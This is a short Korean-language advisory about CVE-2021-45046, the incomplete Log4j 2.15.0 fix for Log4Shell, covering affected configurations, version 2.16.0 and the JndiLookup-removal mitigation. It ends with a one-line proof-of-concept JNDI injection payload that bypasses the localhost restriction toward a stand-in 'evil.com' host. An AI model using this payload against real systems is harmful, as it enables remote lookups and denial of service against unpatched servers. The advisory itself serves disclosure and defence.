
Log4j 2.15.0 권한 상승 -- CVE-2021-45046

Apache Log4j 2.15.0에서 CVE-2021-44228을 해결하기 위한 수정이 특정 비기본 설정에서 불완전한 것으로 확인되었습니다. 로깅 구성이 비기본 Pattern Layout과 Context Lookup(예: $${ctx:loginId}) 또는 Thread Context Map 패턴(%X, %mdc, %MDC)을 함께 사용하는 경우, Thread Context Map(MDC) 입력 데이터를 제어할 수 있는 공격자가 JNDI Lookup 패턴을 사용한 악의적인 입력 데이터를 만들어 서비스 거부(DOS) 공격을 유발할 수 있습니다. Log4j 2.15.0은 기본적으로 JNDI LDAP 조회를 localhost로 제한합니다. log4j2.noFormatMsgLookup 시스템 속성을 true로 설정하는 등의 이전 완화 조치는 이 특정 취약점을 완화하지 못한다는 점에 유의하십시오. Log4j 2.16.0은 메시지 조회 패턴 지원을 제거하고 JNDI 기능을 기본적으로 비활성화하여 이 문제를 해결합니다. 이 문제는 이전 릴리스(<2.16.0)에서 classpath에서 JndiLookup 클래스를 제거하여 완화할 수 있습니다(예: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
Poc
${jndi:ldap://127.0.0.1#evil[.]com:1389/a}